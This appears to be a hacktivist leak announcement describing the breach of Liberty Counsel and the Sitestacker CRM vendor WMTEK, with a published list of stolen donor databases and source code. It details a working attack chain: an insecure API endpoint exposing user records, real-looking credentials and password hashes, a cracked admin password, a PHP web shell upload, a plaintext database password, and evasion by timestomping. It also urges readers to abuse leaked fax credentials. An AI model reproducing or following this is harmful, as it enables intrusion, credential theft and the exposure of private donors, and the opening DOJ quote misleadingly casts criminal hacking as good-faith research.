"The Department of Justice today announced the revision of its policy regarding charging violations of the Computer Fraud and Abuse Act (CFAA). The policy for the first time directs that good-faith security research should not be charged. Good faith security research means accessing a computer solely for purposes of good-faith testing, investigation, and/or correction of a security flaw or vulnerability, where such activity is carried out in a manner designed to avoid any harm to individuals or the public, and where the information derived from the activity is used primarily to promote the security or safety of the class of devices, machines, or online services to which the accessed computer belongs, or those who use such devices, machines, or online services." #Anonymous #OperationJane --==[ Liberty Counsel ]==-- You first caught our attention with your litigation and lobbying against LGBTQ rights. In fact, we first hacked you a full month before we found out about your involvement in overturning Roe vs. Wade. And then we hacked you some more. Noticing a worrying trend of far-right and anti-abortion activists aligning themselves with the evangelical christian movement, hiding their funding sources behind laws that allow church ministries to keep their donations secret. We decided to bring about some much needed radical transparency by taking it upon ourselves to make your list of donors public. --==[ WMTEK / Sitestacker ]==-- WMTEK is the developer of the Sitestacker CRM/CMS software used by Liberty Counsel and a number of evangelical missionary groups to manage their donations and operations. Much like Liberty Counsel, these missionary groups are able to hide their funding from the public behind church ministry secrecy laws. With the exploit we developed against Liberty Counsel, we were also able to hack all of WMTEK's other customers and bring radical transparency to the evangelical missionary movement. --==[ The Exploit ]==-- We began our security assessment by creating an account on Liberty Counsel's website and going to the "My Giving" page. We noticed an interesting XHR request on that page to /p/Contributions/admin/Contributions/getAll.json?frontend=1&include_payment_meth od=1&person_or_affiliated_person_id=12345 Could it be that we could simply change the 'person_or_affiliated_person_id' parameter to view other people's donations? {"message":"You are not authorized to access that location."} Nope! It's not going to be that easy. What else can the API tell us? How about changing "Contributions" to "Users"? "User": { "id": "75", "person_id": "1511", "username": "calin@wmtek.com", "password": "$2a$10$eb5q9e9VdicZeqBsYiKRr.P0H8p5u9jAbUGkvA5u2xxd1YwNElqOO", "saml_id": "calin@wmtek.com", "active": true, "verified": true, "created": "2015-12-23 08:27:00", "modified": "2019-11-14 10:21:42", "api_id": "rgvhhiej", "api_secret": "45a00b1fcde5434c002ba29be69db9e83d71f767", "force_saml": false } We can get other user's profiles, including their bcrypt hashes. Hats off for using bcrypt, it's a secure password algorithm that takes a long time to crack. Let's try cracking the password for the admin support account of Calin from WMTEK anyway... calin@wmtek.com:Password1 Now able to use Calin's administrator account, we went into the /admin panel, and noticed a File Manager feature that allows to upload any file to the website's webroot, including a simple PHP web shell! Using the webshell we can grab the MySQL password from the ../App/Config/database.php file. 'Database/ExtendedMysql', 'persistent' => false, 'host' => 'localhost', 'port' => '3306', 'login' => 'webappuser', 'password' => 'AmLT4ro6Qcgmppqn', 'database' => 'webapp', 'encoding' => 'utf8', ); } And run mysqldump to output a database backup into the webroot. This went smoothly with Liberty Counsel, but while hacking the rest of WMTEK's customers on a Rackspace Managed server, we made a mistake of running `whoami` via the webshell which alerted Rackspace's security team via the Sophos XDR they were running. rack pts/2 iad.secure-acces Wed Jun 8 21:35 gone - no logout rack pts/1 lon.secure-acces Wed Jun 8 21:28 gone - no logout rack pts/0 ord.secure-acces Wed Jun 8 21:11 gone - no logout With 3 security responders hunting for us, we switched from using mysqldump to Adminer for added stealth. We timestomped our webshells and this proved too much for them to find, so they gave up and left us alone. --==[ Contents ]==-- Databases: 25p.sql.zst action.sql.zst adventures.sql.zst agus.sql.zst ai.sql.zst aim.sql.zst aimbak.sql.zst altlink.sql.zst amg.sql.zst apartmentlife.sql.zst ariseafrica.sql.zst arm.sql.zst avant.sql.zst barnabas.sql.zst bbfi.sql.zst bcp.sql.zst bhm.sql.zst bmw.sql.zst c4c.sql.zst cadence.sql.zst cadence_org.sql.zst caritas.sql.zst ccm.sql.zst chc.sql.zst childmaster.sql.zst childrenscup.sql.zst christar.sql.zst church.sql.zst cmr.sql.zst crf.sql.zst crossworld.sql.zst customize.sql.zst cvm.sql.zst djameskennedy.sql.zst donatecadence.sql.zst ecchurch.sql.zst ecm.sql.zst eli.sql.zst ethnos.sql.zst ewp.sql.zst familylegacy.sql.zst frontierventures.sql.zst gf.sql.zst goi.sql.zst gomsandbox.sql.zst gp.sql.zst gtn.sql.zst heartcry.sql.zst hopealiveafrica.sql.zst hot.sql.zst hth.sql.zst iacd.sql.zst ic.sql.zst icn.sql.zst ideas.sql.zst igl.sql.zst iphc.sql.zst iphc_sandbox.sql.zst itec.sql.zst kh.sql.zst lahash.sql.zst lc.sql.zst lc_updated_220708.sql.zst lifeline.sql.zst lifeline_bak.sql.zst lifeline_obfuscated.sql.zst lionheart.sql.zst lusandbox.sql.zst m_ptl.sql.zst maf.sql.zst mbsandbox.sql.zst mfi.sql.zst militarybeliever.sql.zst militarybeliever_restored.sql.zst militarymissionsnetwork.sql.zst missione4.sql.zst missiongo.sql.zst mq.sql.zst multiply.sql.zst mwc.sql.zst mysql.sql.zst nazarene.sql.zst ncboys.sql.zst newtraining.sql.zst nsp.sql.zst ntmcake26.sql.zst ntmusa.sql.zst oms.sql.zst opc.sql.zst rafiki.sql.zst rc.sql.zst reachbeyond.sql.zst reachbeyondtest.sql.zst remoteisland.sql.zst reports.sql.zst sammytippit.sql.zst sams.sql.zst send.sql.zst sitestacker1.sql.zst squareinchv2.sql.zst tb.sql.zst tc.sql.zst test.sql.zst testcc.sql.zst tmi.sql.zst treeoflife.sql.zst twr.sql.zst villagemission.sql.zst wgm.sql.zst wim.sql.zst wmtek.sql.zst wmtek_marketing.sql.zst wog.sql.zst ww.sql.zst These contain the donor lists and all the information about their fundraising efforts. Source code of sitestacker: carlosesquivel/activities-funnel-report-demosite.bundle sitestacker/templates/Base.bundle sitestacker/templates/BaseChildOne.bundle sitestacker/templates/CIDI.bundle sitestacker/templates/CIDIsrael.bundle sitestacker/templates/CRF.bundle sitestacker/templates/Clean.bundle sitestacker/templates/Dashboards.bundle sitestacker/templates/LCBase.bundle sitestacker/templates/LibertyCounsel.bundle sitestacker/templates/LibertyCounselDashboards.bundle sitestacker/templates/LibertyResponsive.bundle sitestacker/templates/LifeUnited.bundle sitestacker/templates/Mobilize.bundle sitestacker/sitestacker.bundle themes/Contributions-LifeUnited.bundle Use `git clone sitestacker/sitestacker.bundle` to checkout the git repository. webroots: avant_webroot.txt.zst crossworld_webroot.txt.zst lc_org_webroot.txt.zst sitestacker_org_webroot.txt.zst vhosts.txt.zst These are directory listings of the web roots of WMTEK customers. You can use these to archive all the publicly-available files they host. We did it for Liberty Counsel and packaged it as lc_webroot.tar.zst. We recommend transcribing all of the "Freedom's Call" podcast files with speech-to-text software to see if they revealed any more embarrassing information like the time they admitted that they pray with the Supreme Court justices. https://www.rollingstone.com/politics/politics-features/roe-supreme-court-justic es-1378046/ misc: MTW.org-210610.7z: Backup of Mission to the World/mtw.org website. They were the only ones running Sitestacker on Windows with SQL Server and we found it easier to simply make a copy of their own backup. lcFax.tar.zst: PHP script Liberty Counsel uses to fax their petitions to legislators. You can send your own faxes using the credentials included and have them pay for it. frc-old-sites.tar.zst: ColdFusion source code of the Family Research Council (frc.org) website. /\ ____ <> ( oo ) <>_| ^^ |_ <> @ \ /~~\ . . _ | /~~~~\ | | /~~~~~~\/ _| | |[][][]/ / [m] |[][][[m] |[][][]| |[][][]| |[][][]| |[][][]| |[][][]| |[][][]| |[][][]| |[][][]| |[|--|]| |[| |]| ======== ========== |[[ ]]| Remember: ========== King Kong died for YOUR sins!